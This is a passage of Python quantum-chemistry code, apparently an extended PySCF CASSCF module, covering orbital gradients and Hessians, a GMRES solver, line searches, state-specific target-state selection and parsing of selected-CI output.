h1e_mo = reduce(numpy.dot, (mo.T, casscf.get_hcore(), mo))
################# gradient #################
g = numpy.zeros_like(h1e_mo)
g[:,:ncore] = (h1e_mo[:,:ncore] + vhf_ca[:,:ncore]) * 2
g[:,ncore:nocc] = numpy.dot(h1e_mo[:,ncore:nocc]+eris.vhf_c[:,ncore:nocc],casdm1)
g[:,ncore:nocc] += g_dm2
def gorb_update(u, fcivec):
uc = u[:,:ncore].copy()
ua = u[:,ncore:nocc].copy()
rmat = u - numpy.eye(nmo)
ra = rmat[:,ncore:nocc].copy()
mo1 = numpy.dot(mo, u)
mo_c = numpy.dot(mo, uc)
mo_a = numpy.dot(mo, ua)
dm_c = numpy.dot(mo_c, mo_c.T) * 2
casdm1, casdm2 = casscf.fcisolver.make_rdm12(fcivec, ncas, nelecas)
dm_a = reduce(numpy.dot, (mo_a, casdm1, mo_a.T))
vj, vk = casscf.get_jk(casscf.mol, (dm_c, dm_a))
vhf_c = reduce(numpy.dot, (mo1.T, vj[0]-vk[0]*.5, mo1[:,:nocc]))
vhf_a = reduce(numpy.dot, (mo1.T, vj[1]-vk[1]*.5, mo1[:,:nocc]))
h1e_mo1 = reduce(numpy.dot, (u.T, h1e_mo, u[:,:nocc]))
p1aa = numpy.empty((nmo,ncas,ncas*ncas))
paa1 = numpy.empty((nmo,ncas*ncas,ncas))
aaaa = numpy.empty([ncas]*4)
for i in range(nmo):
jbuf = eris.ppaa[i]
kbuf = eris.papa[i]
p1aa[i] = lib.dot(ua.T, jbuf.reshape(nmo,-1))
paa1[i] = lib.dot(kbuf.transpose(0,2,1).reshape(-1,nmo), ra)
if ncore <= i < nocc:
aaaa[i-ncore] = jbuf[ncore:nocc]
g = numpy.zeros_like(h1e_mo)
g[:,:ncore] = (h1e_mo1[:,:ncore] + vhf_c[:,:ncore] + vhf_a[:,:ncore]) * 2
g[:,ncore:nocc] = numpy.dot(h1e_mo1[:,ncore:nocc]+vhf_c[:,ncore:nocc], casdm1)
# 0000 + 1000 + 0100 + 0010 + 0001 + 1100 + 1010 + 1001 (missing 0110 + 0101 + 0011)
p1aa = lib.dot(u.T, p1aa.reshape(nmo,-1)).reshape(nmo,ncas,ncas,ncas)
paa1 = lib.dot(u.T, paa1.reshape(nmo,-1)).reshape(nmo,ncas,ncas,ncas)
p1aa += paa1
p1aa += paa1.transpose(0,1,3,2)
g[:,ncore:nocc] += numpy.einsum('puwx,wxuv->pv', p1aa, casdm2)
return casscf.pack_uniq_var(g-g.T)
#Lan needs to get g only
if get_g:
return g, gorb_update
############## hessian, diagonal ###########
# part7
h_diag = numpy.einsum('ii,jj->ij', h1e_mo, dm1) - h1e_mo * dm1
h_diag = h_diag + h_diag.T
# part8
g_diag = g.diagonal()
h_diag -= g_diag + g_diag.reshape(-1,1)
idx = numpy.arange(nmo)
h_diag[idx,idx] += g_diag * 2
# part2, part3
v_diag = vhf_ca.diagonal() # (pr|kl) * E(sq,lk)
h_diag[:,:ncore] += v_diag.reshape(-1,1) * 2
h_diag[:ncore] += v_diag * 2
idx = numpy.arange(ncore)
h_diag[idx,idx] -= v_diag[:ncore] * 4
# V_{pr} E_{sq}
tmp = numpy.einsum('ii,jj->ij', eris.vhf_c, casdm1)
h_diag[:,ncore:nocc] += tmp
h_diag[ncore:nocc,:] += tmp.T
tmp = -eris.vhf_c[ncore:nocc,ncore:nocc] * casdm1
h_diag[ncore:nocc,ncore:nocc] += tmp + tmp.T
# part4
# -2(pr|sq) + 4(pq|sr) + 4(pq|rs) - 2(ps|rq)
tmp = 6 * eris.k_pc - 2 * eris.j_pc
h_diag[ncore:,:ncore] += tmp[ncore:]
h_diag[:ncore,ncore:] += tmp[ncore:].T
# part5 and part6 diag
# -(qr|kp) E_s^k p in core, sk in active
h_diag[:nocc,ncore:nocc] -= jkcaa
h_diag[ncore:nocc,:nocc] -= jkcaa.T
v_diag = numpy.einsum('ijij->ij', hdm2)
h_diag[ncore:nocc,:] += v_diag.T
h_diag[:,ncore:nocc] += v_diag
# Does this term contribute to internal rotation?
# h_diag[ncore:nocc,ncore:nocc] -= v_diag[:,ncore:nocc]*2
g_orb = casscf.pack_uniq_var(g-g.T)
h_diag = casscf.pack_uniq_var(h_diag)
#print "g shape", g.shape[0], g.shape[1], g_orb.shape[0]
def h_op(x):
x1 = casscf.unpack_uniq_var(x)
# part7
# (-h_{sp} R_{rs} gamma_{rq} - h_{rq} R_{pq} gamma_{sp})/2 + (pr<->qs)
x2 = reduce(lib.dot, (h1e_mo, x1, dm1))
# part8
# (g_{ps}\delta_{qr}R_rs + g_{qr}\delta_{ps}) * R_pq)/2 + (pr<->qs)
x2 -= numpy.dot((g+g.T), x1) * .5
# part2
# (-2Vhf_{sp}\delta_{qr}R_pq - 2Vhf_{qr}\delta_{sp}R_rs)/2 + (pr<->qs)
x2[:ncore] += reduce(numpy.dot, (x1[:ncore,ncore:], vhf_ca[ncore:])) * 2
# part3
# (-Vhf_{sp}gamma_{qr}R_{pq} - Vhf_{qr}gamma_{sp}R_{rs})/2 + (pr<->qs)
x2[ncore:nocc] += reduce(numpy.dot, (casdm1, x1[ncore:nocc], eris.vhf_c))
# part1
x2[:,ncore:nocc] += numpy.einsum('purv,rv->pu', hdm2, x1[:,ncore:nocc])
if ncore > 0:
# part4, part5, part6
# Due to x1_rs [4(pq|sr) + 4(pq|rs) - 2(pr|sq) - 2(ps|rq)] for r>s p>q,
# == -x1_sr [4(pq|sr) + 4(pq|rs) - 2(pr|sq) - 2(ps|rq)] for r>s p>q,
# x2[:,:ncore] += H * x1[:,:ncore] => (becuase x1=-x1.T) =>
# x2[:,:ncore] += -H' * x1[:ncore] => (becuase x2-x2.T) =>
# x2[:ncore] += H' * x1[:ncore]
va, vc = casscf.update_jk_in_ah(mo, x1, casdm1, eris)
x2[ncore:nocc] += va
x2[:ncore,ncore:] += vc
# (pr<->qs)
x2 = x2 - x2.T
if casscf.is_gmres_trust_region:
x2 += 0.1 * x1
return casscf.pack_uniq_var(x2)
return g_orb, gorb_update, h_op, h_diag
# BGN Lan's SS-CASSCF
#GMRES solver
def genMinRes(casscf, bvec, xguess, linear_transform, inner_product=None, precondition=None, thresh=1.0e-6, maxiter=20):
"""
Solves the linear system A x = b via the generalized minimal residual method, written by Eric Neuscamman.
required inputs:
bvec the vector b
xguess an initial guess for the vector x
linear_transform function that performs the linear transformation A x
optional inputs:
inner_product function of two inputs that computes their inner product, defaults to vector dot product
precondition function of one input (e.g. x) that returns an approximation to A^(-1) x, defaults to the identity
thresh error threshold below which to stop the iterations, defaults to 1.0e-6
maxiter maximum number of iterations, defaults to 20
Returns the solution vector x.
"""
import numpy as np
log = logger.new_logger(casscf, verbose=None)
# default is to use no preconditioning
if precondition is None:
precondition = lambda x: x
# default inner product is the simple vector dot product
if inner_product is None:
inner_product = lambda x, y: np.sum( x * y )
# create a function to reshape vectors into the same shape as the input
rsInput = lambda x: np.reshape(x, bvec.shape)
# create a function to reshape vectors into the shape used internally
rsInternal = lambda x: np.reshape(x, [bvec.size, 1] )
# create a function to take inner products
ip = lambda x, y: inner_product( rsInput(x), rsInput(y) )
# create a function to evaluate a vector's norm
norm = lambda x: np.sqrt( ip(x,x) )
# create a function to apply the linear transformation and reshape
lt = lambda x: rsInternal( linear_transform( rsInput(x) ) )
# get initial c vector
c = np.reshape( np.array( [ norm(xguess) ] ), [1,1] )
# get first Krylov vector
Y = np.reshape( xguess / c[0,0], [bvec.size, 1] )
# get linear transformation of first Krylov vector
AY = lt(Y[:,0:1])
# iterate
for iteration in range(maxiter+1):
# get linear transform on current x vector
Ax = np.dot(AY,c)
# get residual
r = rsInternal(bvec) - Ax
# get residual norm and check for convergence
res_norm = norm(r)
#log.debug("iteration %4i res_norm = %12.6e", iteration, res_norm )
sys.stdout.flush()
if res_norm < thresh:
log.info( "genMinRes converged after %i iterations", iteration)
return rsInput(np.dot(Y,c))
# stop if the maximum number of iterations has been reached
if iteration == maxiter:
log.info("genMinRes reached the maximum number of iterations.")
log.info("Returning the current best estimate to the solution.")
return rsInput(np.dot(Y,c))
# get next krylov vector
q = rsInternal( precondition( rsInput(r) ) )
# orthonormalize new krylov vector against existing krylov vectors
for i in range(Y.shape[1]):
q = q - ip(Y[:,i:i+1], q) * Y[:,i:i+1]
q = q / norm(q)
# save the new Krylov vector
Y = np.concatenate( [ Y, q ], 1 )
# save the linear transformation of the new Krylov vector
AY = np.concatenate( [ AY, lt(q) ], 1 )
# get the SVD of the matrix of linearly transformed Krylov vectors
U, sigma, VT = np.linalg.svd(AY, full_matrices=False)
# get the pseudo-inverse of the singular values
inv_sigma = np.zeros([sigma.size, 1])
for i in range(sigma.size):
if np.abs( sigma[i] / sigma[0] ) > 1.0e-8:
inv_sigma[i,0] = 1.0 / sigma[i]
# get the new c vector
c = np.dot( np.transpose(VT), inv_sigma * np.dot( np.transpose(U), rsInternal(bvec) ) )
#line search to minimize gradE w.r.t orb. rotation
def lineSearch_naive(casscf, dr, fcivec, u, gorb_update):
log = logger.new_logger(casscf, verbose=None)
u_new = casscf.update_rotate_matrix(dr, u)
gorb = gorb_update(u_new, fcivec())
norm_gorb = numpy.linalg.norm(gorb)
log.debug(' before line search |g|=%5.3g', norm_gorb)
if norm_gorb < 1e-04:
return u_new, gorb
alpha_min = 1
norm_gorb_min = norm_gorb
alpha = 0
while alpha < 3:
u_new = casscf.update_rotate_matrix(alpha*dr, u)
gorb = gorb_update(u_new, fcivec())
norm_gorb = numpy.linalg.norm(gorb)
#log.debug("alpha = %5.4f norm_gorb = %12.6e", alpha, norm_gorb )
if norm_gorb < norm_gorb_min:
norm_gorb_min = norm_gorb
alpha_min = alpha
alpha += 0.1
alpha = alpha_min
u_new = casscf.update_rotate_matrix(alpha*dr, u)
gorb = gorb_update(u_new, fcivec())
norm_gorb = numpy.linalg.norm(gorb)
log.info(" Best step length = %5.4f norm_gorb = %5.6f", alpha, norm_gorb )
return u_new, gorb
def lineSearch(casscf, dr, fcivec, u, gorb_update):
log = logger.new_logger(casscf, verbose=None)
ncore = casscf.ncore
ncas = casscf.ncas
nocc = ncore+ncas
u_new = casscf.update_rotate_matrix(dr, u)
gorb = gorb_update(u_new, fcivec())
norm_gorb = numpy.linalg.norm(gorb)
log.debug(' before line search |g|=%5.3g', norm_gorb)
if norm_gorb < 1e-06:
return u_new, gorb
def dgorb_dalpha(alpha):
dalpha = 1e-07
u_new = casscf.update_rotate_matrix((alpha+dalpha)*dr, u)
gorb = gorb_update(u_new, fcivec())
norm_gorb = numpy.linalg.norm(gorb)
u_new = casscf.update_rotate_matrix(alpha*dr, u)
gorb = gorb_update(u_new, fcivec())
norm_gorb -= numpy.linalg.norm(gorb)
return norm_gorb/dalpha
alpha_upper = 0
alpha_lower = 0
alpha = 0.
list_bound = []
list_norm_min = []
while alpha <= 2:
dnorm = dgorb_dalpha(alpha)
u_new = casscf.update_rotate_matrix(alpha*dr, u)
gorb = gorb_update(u_new, fcivec())
norm_gorb = numpy.linalg.norm(gorb)
if alpha > 0.:
if dnorm_old < 0 and dnorm > 0:
list_bound.append([alpha_old, alpha])
list_norm_min.append(norm_gorb)
elif dnorm_old > 0 and dnorm < 0:
list_bound.append([alpha, alpha_old])
list_norm_min.append(norm_gorb)
dnorm_old = dnorm
alpha_old = alpha
alpha += 0.02
if (len(list_bound) != 0):
# find the global minimum of norm_gorb
from operator import itemgetter
idx = min(enumerate(list_norm_min), key=itemgetter(1))[0]
alpha_lower = list_bound[idx][0]
alpha_upper = list_bound[idx][1]
log.info(" global minimum of norm_gorb is in [%5.4f, %5.4f]", alpha_lower, alpha_upper)
log.info(" perform bisection to find the best step length")
alpha = 0.5*(alpha_upper + alpha_lower)
dnorm = dgorb_dalpha(alpha)
while abs(dnorm) > 1e-04:
if dnorm < 0:
alpha_lower = alpha
else:
alpha_upper = alpha
alpha = 0.5*(alpha_upper + alpha_lower)
dnorm = dgorb_dalpha(alpha)
u_new = casscf.update_rotate_matrix(alpha*dr, u)
gorb = gorb_update(u_new, fcivec())
norm_gorb = numpy.linalg.norm(gorb)
log.debug("alpha = %5.4f dnorm_gorb = %12.6f norm_gorb = %5.6f", alpha, dnorm, norm_gorb )
else:
log.info('there are no bounds => alpha = 1')
alpha = 1
u_new = casscf.update_rotate_matrix(alpha*dr, u)
gorb = gorb_update(u_new, fcivec())
norm_gorb = numpy.linalg.norm(gorb)
log.info(" Best step length = %5.4f norm_gorb = %5.6f", alpha, norm_gorb )
return u_new, gorb
# orbital optimization using GMRES
def rotate_orb_gmres(casscf, mo, fcivec, fcasdm1, fcasdm2, eris, imacro, x0_guess=None,
conv_tol_grad=1e-4, max_stepsize=None, verbose=None):
log = logger.new_logger(casscf, verbose)
t3m = (time.clock(), time.time())
u = 1
#print "fcasdm1"
#print fcasdm1()
g_orb, gorb_update, h_op, h_diag = \
casscf.gen_g_hop(mo, u, fcasdm1(), fcasdm2(), eris)
norm_gorb = numpy.linalg.norm(g_orb)
log.debug(' before gmres |g|=%5.3g', norm_gorb)
t3m = log.timer('gen h_op', *t3m)
def precond(x):
hdiagd = h_diag - casscf.gmres_hess_shift
hdiagd[abs(hdiagd)<1e-8] = 1e-8
x = x/hdiagd
norm_x = numpy.linalg.norm(x)
x *= 1/norm_x
#if norm_x < 1e-2:
# x *= 1e-2/norm_x
return x
jkcount = 0
x0_guess = g_orb
dr = 0
#call GMRES
bvec = -g_orb
norm_gorb = numpy.linalg.norm(g_orb)
tol = casscf.gmres_conv_tol
if casscf.is_gmres_conv_dynm:
tol = 0.25*norm_gorb
log.info('genMinRes tol is dynamically changed: %5.3g', tol )
if casscf.is_gmres_precond:
dr = genMinRes(casscf, bvec, x0_guess, h_op, thresh=tol, maxiter=casscf.gmres_max_cycle, precondition=precond)
else:
dr = genMinRes(casscf, bvec, x0_guess, h_op, thresh=tol, maxiter=casscf.gmres_max_cycle)
#call line search
if casscf.is_line_search:
u_new, g_orb = lineSearch_naive(casscf, dr, fcivec, u, gorb_update)
else:
#if numpy.amax(abs(dr)) > 0.05:
# dr *= 0.1/numpy.amax(abs(dr))
u_new = casscf.update_rotate_matrix(dr, u)
g_orb = gorb_update(u_new, fcivec())
norm_gorb = numpy.linalg.norm(g_orb)
log.debug(' after gmres + linesearch |g|=%5.3g', norm_gorb)
return u_new, g_orb
#Target state
def rota_rdms(mo_coeff, rdm1_AO):
from numpy.linalg import pinv
mo_coeff_inv = pinv(mo_coeff)
rdm1_MO = reduce(numpy.dot, (mo_coeff_inv, rdm1_AO, mo_coeff_inv.T))
return rdm1_MO
def read_sCI_output(ncas):
"""
Function to convert the sCI output into a form usable in the SS-CASSCF
INPUT:
ncas -- number of electrons in the active space
OUTPUT:
civec -- vector of vectors of coefficients for each state
config -- configurations associated with the above vectors
spin_square_vals -- list of spin square for the read in states
"""
file1 = open('output.dat', 'r')
Lines = file1.readlines()
#LANS / OLDER VERSION OF EXTRACTING THE CI VECTOR FROM DICE
#
#count = 0
#save_line = []
#state_list = []
#k = 0
#list_len_civec = []
#for line in Lines:
# save_line.append(line.strip())
# if line.strip()[0:5] == 'State':
# if line.strip()[10] != "0":
# list_len_civec.append(k-1)
# k = 0
#
# if line.strip()[0:9] == "Returning" or line.strip()[0:12] == "PERTURBATION":
# list_len_civec.append(k-4)
# k += 1
#
#i = 0
#civec = []
#config = []
#while i < len(save_line):
# if save_line[i][0:5] == "State":
# istate = int(save_line[i][10])
# len_civec = list_len_civec[istate]
# civec_istate = []
# config_istate = []
# for j in xrange(len_civec):
# civec_istate.append(float(save_line[i+j+1][7:19]))
# tmp_ = []
# l = 0
# for k in xrange(ncas):
# l = 22+2*k
# tmp_.append(save_line[i+j+1][l])
# config_istate.append(tmp_)
# civec.append(civec_istate)
# config.append(config_istate)
# i += 1
#
#return civec, config
save_line_flag=False
save_lines=[]
# intermediate step, we need the length of each CI vector for how we read
# them in the next step
ndets=0
len_ci_vecs=[]
spin_square_vals=[]
#Set the number of determinants in the CI vector for each state
for line in Lines:
# We'll parse here and only use the shorter saved lines later
if save_line_flag:
save_lines.append(line.strip())
# The line contains the state label
if 'State' in line:
spin_square_vals.append(float(line.split()[6]))
#print("spin square for this one was:")
#print(spin_square_vals)
# If it's not the first state, store the length of the state
#if line[len(line)-1]!='0':
if "State : 0" not in line:
#print("Not the first state")
len_ci_vecs.append(ndets-1)
# It is the first state, so let's start saving lines
else:
save_lines.append(line.strip())
save_line_flag=True
# Reset the counter since we've found a new state
ndets=0
# End of the printed states, save the length of last state and exit this
# loop to stop saving further lines
if "PERTURBATION" in line:
len_ci_vecs.append(ndets-4)
break
# incriment the counter for number of dets in a state
ndets+=1
#print("Found " + str(len(len_ci_vecs)) + " dets with lengths:")
#print(len_ci_vecs)
# Read & save the states.
all_ci_vectors=[]
all_ci_coeffs=[]
i=0
while i < len(save_lines):
if 'State' in save_lines[i]:
# Get the state index
state_index=int(save_lines[i][len(save_lines[i])-1])
# Set the number of lines to expect
ci_vec_ndets=len_ci_vecs[state_index]
# Empty lists to hold the read coefficients
state_ci_coeffs=[]
state_ci_vecs=[]
for j in range(ci_vec_ndets):
# Stores the coefficient and the remainder of the active space
# vector into it's own list
#print(save_lines[i+j+1])
state_ci_coeffs.append(float((save_lines[i+j+1].split())[1]))
state_ci_vecs.append(save_lines[i+j+1].split()[2:])
all_ci_coeffs.append(state_ci_coeffs)
all_ci_vectors.append(state_ci_vecs)
# Not the most efficient way to do this, but it is just counting so.....
i+=1
return all_ci_coeffs, all_ci_vectors, spin_square_vals
def extract_spin_state_sCI(istate, civec, config):
spin_istate = 0.0
tmp_ = config[istate][0]
#print "for state", istate
#print civec[istate]
#print config[istate]
count_alpha = tmp_.count('a')
count_beta = tmp_.count('b')
#if count_alpha != count_beta:
# spin_istate = abs(count_alpha-count_beta)
# #print "we are here 111", count_alpha, count_beta, tmp_
#elif abs(civec[istate][0]+civec[istate][1]) < 1e-03:
# spin_istate = 1.0
#else:
#print "we are here 222"
#for iconfig in xrange(0,len(civec[istate])):
# if abs(civec[istate][iconfig]) > 0:
# tmp_ = config[istate][iconfig]
# count_alpha = tmp_.count('a')
# count_beta = tmp_.count('b')
# #print "we are here 333"
# if count_alpha != count_beta:
spin_istate = abs(count_alpha-count_beta)
# break
return 0.5*spin_istate*(0.5*spin_istate+1)
def select_target_state(casscf, mo_coeff, fcivec, e_tot, envs, target_state, nroots, eris):
log = logger.new_logger(casscf, verbose=None)
norb = mo_coeff.shape[1]
ncore = casscf.ncore
ncas = casscf.ncas
nocc = ncore+ncas
omega = envs['omega']
rdm1Target_AO = envs['rdm1Target_AO'] # in AOs
d_target = scf.hf.dip_moment(mol=casscf.mol, dm=rdm1Target_AO)
#reading sCI information from output.dat
civec = [] #dump variable for sCI
config = [] # dump variable for sCI
spin_square_states = []
if(casscf.is_use_sCI):
civec, config, spin_square_states = read_sCI_output(ncas)
def eval_Hsqr(s):
#wfn_norm = numpy.sqrt(numpy.sum(numpy.matmul(fcivec[s], fcivec[s].T)))
casdm1, casdm2 = casscf.fcisolver.make_rdm12(fcivec[s], ncas, casscf.nelecas)
#casdm1 = casscf.fcisolver.make_rdm1(fcivec[s], ncas, casscf.nelecas)
#casdm2 = casscf.fcisolver.make_rdm2(fcivec[s], ncas, casscf.nelecas)
g, gorb_update = gen_g_hop(casscf, mo_coeff, 1, casdm1, casdm2, eris, get_g=True)
gorb = casscf.pack_uniq_var(g-g.T)
Hsqr = numpy.sum(numpy.square(gorb)) #/ wfn_norm
gorbNorm = numpy.linalg.norm(gorb)
return Hsqr, gorbNorm
rdm1Target = rota_rdms(mo_coeff, rdm1Target_AO)
W_list = []
s_list = []
d_list = []
for s in range(nroots):
if not casscf.is_use_sCI:
ss = casscf.fcisolver.spin_square(fcivec[s], ncas, casscf.nelecas)[0]
else:
ss = extract_spin_state_sCI(s, civec, config)
# Pick out of the read in spin square options to go after the right
# spin state
ss = spin_square_states[s]
casdm1, casdm2 = casscf.fcisolver.make_rdm12(fcivec[s], ncas, casscf.nelecas)
rdm1_MO, rdm2_MO = addons._make_rdm12_on_mo(casdm1, casdm2, ncore, ncas, norb)
ddmNorm = 1./ncas * numpy.linalg.norm(rdm1_MO - rdm1Target)
print()
print("dipole for Root", s)
rdm1_AO = addons.make_rdm1(casscf, mo_coeff, fcivec[s])
d = scf.hf.dip_moment(mol=casscf.mol, dm=rdm1_AO, print_dip=False)
dNorm = numpy.linalg.norm(d - d_target) / (5.*ncas)
d_list.append(d)
W = numpy.square(omega - e_tot[s]) + eval_Hsqr(s)[0] + ddmNorm
if casscf.is_target_dipole:
W += dNorm
if casscf.is_only_ddm:
W = ddmNorm
elif casscf.is_only_W:
W = numpy.square(omega - e_tot[s]) + eval_Hsqr(s)[0]
elif casscf.is_only_H2:
W = eval_Hsqr(s)[0]
elif casscf.is_only_E:
W = numpy.square(omega - e_tot[s])
elif casscf.is_only_dipole:
dNorm = numpy.linalg.norm(d - d_target) / (5.*ncas)
W = dNorm
elif casscf.is_ddm_and_dipole:
W = ddmNorm + dNorm
#print
log.info('Root %d : Total = %.6f (omega-E)^2 = %.6f Hsqr = %.6f ddmNorm = %.6f dNorm = %.6f S^2 = %.6f',
s, W, numpy.square(omega - e_tot[s]), eval_Hsqr(s)[0], ddmNorm, dNorm, ss)
#d *= nist.AU2DEBYE
#log.note('Dipole moment(X, Y, Z, Debye): %8.5f, %8.5f, %8.5f', *d)
print()
ss_target = 0.5*casscf.target_state_spin*(0.5*casscf.target_state_spin+1)
if abs(ss - ss_target) < 1e-1:
W_list.append(W)
s_list.append(s)
#print "Natural orbital analysis: "
if not casscf.is_use_sCI:
nat_orbs = casscf.cas_natorb(mo_coeff, fcivec[s])
#print
#print "CI vector"
#print fcivec[s]
#print 'wfn_norm = ', wfn_norm
#print
assert(len(W_list) == len(s_list))
W_min = W_list[0]
for i in range(len(W_list)):
#print 'w_min', W_min, W_list[0], target_state
if abs(W_list[i]) <= abs(W_min):
target_state = s_list[i]
W_min = W_list[i]
return target_state, d_list[target_state]
#not used# def eval_energy(alpha, dalpha=0): # objective function
#not used# alpha += dalpha
#not used# u_new = casscf.update_rotate_matrix(alpha*dr, u)
#not used# mo_coeff_new = casscf.rotate_mo(mo_coeff, u_new)
#not used# energy_core = casscf.energy_nuc()
#not used# h1e_ao = casscf.get_hcore()
#not used# if(ncore > 0):
#not used# mo_core = mo_coeff_new[:,:ncore]
#not used# core_dm = numpy.dot(mo_core, mo_core.T) * 2
#not used# energy_core += numpy.einsum('ij,ji', core_dm, casscf.get_hcore())
#not used# energy_core += numpy.einsum('ij,ji', core_dm, casscf.get_veff(casscf.mol)) * .5
#not used# h1e_ao += casscf.get_veff(casscf.mol, core_dm)
#not used#
#not used# h1e = reduce(numpy.dot, (mo_coeff_new[:,ncore:nocc].T, h1e_ao, mo_coeff_new[:,ncore:nocc]))
#not used# eri = ao2mo.kernel(casscf.mol, mo_coeff_new[:,ncore:nocc], compact=False)
#not used# eri = numpy.reshape(eri, (ncas, ncas, ncas, ncas))
#not used#
#not used# #rdm1, rdm2 = make_rdm12(casscf, s)
#not used# casdm1 = casscf.fcisolver.make_rdm1(fcivec(), ncas, casscf.nelecas)
#not used# casdm2 = casscf.fcisolver.make_rdm2(fcivec(), ncas, casscf.nelecas)
#not used# H_1e = numpy.einsum('ik,ik->', casdm1, h1e) #[:ncas,:ncas]
#not used# H_2e = numpy.einsum('ijkl,ijkl->', casdm2, eri) # 2. W_2e [:ncas,:ncas,:ncas,:ncas]
#not used#
#not used# return energy_core + H_1e + 0.5 * H_2e
#not used#
def eval_energy(mol, h1e_ao, enuc, mo_coeff, ncas, casdm1, casdm2): # objective function
#mo_coeff = casscf.mo_coeff
#energy_core = mol.energy_nuc()
#h1e_ao = casscf.get_hcore()
#if(ncore > 0):
# mo_core = mo_coeff[:,:ncore]
# core_dm = numpy.dot(mo_core, mo_core.T) * 2
# energy_core += numpy.einsum('ij,ji', core_dm, casscf.get_hcore())
# energy_core += numpy.einsum('ij,ji', core_dm, casscf.get_veff(casscf.mol)) * .5
# h1e_ao += casscf.get_veff(casscf.mol, core_dm)
ncore = 0
nocc = ncas
h1e = reduce(numpy.dot, (mo_coeff[:,ncore:nocc].T, h1e_ao, mo_coeff[:,ncore:nocc]))
eri = ao2mo.kernel(mol, mo_coeff[:,ncore:nocc], compact=False)
eri = numpy.reshape(eri, (ncas, ncas, ncas, ncas))
#rdm1, rdm2 = make_rdm12(casscf, s)
#casdm1 = casscf.fcisolver.make_rdm1(fcivec(), ncas, casscf.nelecas)
#casdm2 = casscf.fcisolver.make_rdm2(fcivec(), ncas, casscf.nelecas)
H_1e = numpy.einsum('ik,ik->', casdm1, h1e) #[:ncas,:ncas]
H_2e = numpy.einsum('ijkl,ijkl->', casdm2, eri) # 2. W_2e [:ncas,:ncas,:ncas,:ncas]
print("H_1e", H_1e, H_2e)
return enuc + H_1e + 0.5 * H_2e
def genMOandCI(mc, mol, civec=None, mo_coeff=None):
if mo_coeff is None:
mo_coeff = mc.mo_coeff
if civec is None:
#if mc.fcisolver.nroots == 1:
civec = mc.ci
#else:
# civec = mc.ci[mc.target_state]
#print civec
# print "xxxx ", civec.shape[0], civec.shape[1]
ncas = mc.ncas
neleca, nelecb = mc.nelecas
#mol = mc.mol
nmo = mo_coeff.shape[1]
ncore = mc.ncore
nvir = nmo - ncore - ncas
nocc = ncas
#normalize civec
wfn_norm = numpy.sqrt(numpy.sum(numpy.matmul(civec, civec.T)))
#civec = civec/wfn_norm
print('||civec|| = ', numpy.sqrt(numpy.sum(numpy.matmul(civec, civec.T))))
#print ""
#print "NEW MO COEFFICIENTS"
#print ""
#print ""
#print ""
#
#tools.dump_mat.dump_mo(mol, mo_coeff, label=mol.ao_labels(), ncol=5, digits=6)
def gen_string():
# for alpha
a = [bin(x) for x in fci.cistring.make_strings(range(ncas),neleca)]
stringa = []
for k in range(len(a)):
b = list(a[k])[len(list(a[k]))-1]
for i in range(0,len(list(a[k]))-1):
j = len(list(a[k]))-2-i
if j > 1:
b += list(a[k])[j]
if len(list(b)) < ncas:
for i in range(ncas-len(list(b))):
b += '0'
#print b
c = ''
for i in range(ncore):
c += '1'
d = ''
for i in range(nvir):
d += '0'
stringa.append(b)
# for beta
a = [bin(x) for x in fci.cistring.make_strings(range(ncas),nelecb)]
stringb = []
for k in range(len(a)):
b = list(a[k])[len(list(a[k]))-1]
for i in range(0,len(list(a[k]))-1):
j = len(list(a[k]))-2-i
if j > 1:
b += list(a[k])[j]
if len(list(b)) < ncas:
for i in range(ncas-len(list(b))):
b += '0'
#print b
c = ''
for i in range(ncore):
c += '1'
d = ''
for i in range(nvir):
d += '0'
stringb.append(b)
combo = []
#print "xxxx ", len(stringa), len(stringb), civec.shape[0], civec.shape[1]
for i in range(len(stringb)):
for j in range(len(stringa)):
#print i, j, stringa[j], stringb[i], civec[j,i]
combo.append([stringa[j], stringb[i], civec[j,i]])
#for i in range(len(combo)):
# print combo[i][0], combo[i][1], combo[i][2]
#print(fci.cistring.gen_linkstr_index(range(4),2))
return combo
string = gen_string()
print()
print()
print(" ALPHA | BETA | COEFFICIENT")
for i in range(nocc):
sys.stdout.write("-")
print("-|-",)
for i in range(nocc):
sys.stdout.write("-")
#print "-",
print("-|-",)
for i in range(20):
sys.stdout.write("-")
#print "-",
print
#print " ", stringa
#print " ", stringb
for i in range(len(string)):
if abs(string[i][2]) > 0.1:
sys.stdout.write(str(string[i][0]))
print(" | ",)
sys.stdout.write(str(string[i][1]))
print(" | ",)
sys.stdout.write(str(string[i][2]))
print()
print("..... DONE WITH GENERAL CI COMPUTATION ..... ")
# END Lan's SS-CASSCF
def rotate_orb_cc(casscf, mo, fcivec, fcasdm1, fcasdm2, eris, x0_guess=None,
conv_tol_grad=1e-4, max_stepsize=None, verbose=None):
log = logger.new_logger(casscf, verbose)
if max_stepsize is None:
max_stepsize = casscf.max_stepsize
t3m = (time.clock(), time.time())
u = 1
g_orb, gorb_update, h_op, h_diag = \
casscf.gen_g_hop(mo, u, fcasdm1(), fcasdm2(), eris)
ngorb = g_orb.size
g_kf = g_orb
norm_gkf = norm_gorb = numpy.linalg.norm(g_orb)
log.debug(' |g|=%5.3g', norm_gorb)
t3m = log.timer('gen h_op', *t3m)
if norm_gorb < conv_tol_grad*.3:
u = casscf.update_rotate_matrix(g_orb*0)
yield u, g_orb, 1, x0_guess
return
def precond(x, e):
hdiagd = h_diag-(e-casscf.ah_level_shift)
hdiagd[abs(hdiagd)<1e-8] = 1e-8
x = x/hdiagd
norm_x = numpy.linalg.norm(x)
x *= 1/norm_x
#if norm_x < 1e-2:
# x *= 1e-2/norm_x
return x
jkcount = 0
if x0_guess is None:
x0_guess = g_orb
imic = 0
dr = 0
ikf = 0
g_op = lambda: g_orb
for ah_end, ihop, w, dxi, hdxi, residual, seig \
in ciah.davidson_cc(h_op, g_op, precond, x0_guess,
tol=casscf.ah_conv_tol, max_cycle=casscf.ah_max_cycle,
lindep=casscf.ah_lindep, verbose=log):
# residual = v[0] * (g+(h-e)x) ~ v[0] * grad
norm_residual = numpy.linalg.norm(residual)
if (ah_end or ihop == casscf.ah_max_cycle or # make sure to use the last step
((norm_residual < casscf.ah_start_tol) and (ihop >= casscf.ah_start_cycle)) or
(seig < casscf.ah_lindep)):
imic += 1
dxmax = numpy.max(abs(dxi))
if dxmax > max_stepsize:
scale = max_stepsize / dxmax
log.debug1('... scale rotation size %g', scale)
dxi *= scale
hdxi *= scale
else:
scale = None
g_orb = g_orb + hdxi
dr = dr + dxi
norm_gorb = numpy.linalg.norm(g_orb)
norm_dxi = numpy.linalg.norm(dxi)
norm_dr = numpy.linalg.norm(dr)
log.debug(' imic %d(%d) |g[o]|=%5.3g |dxi|=%5.3g '
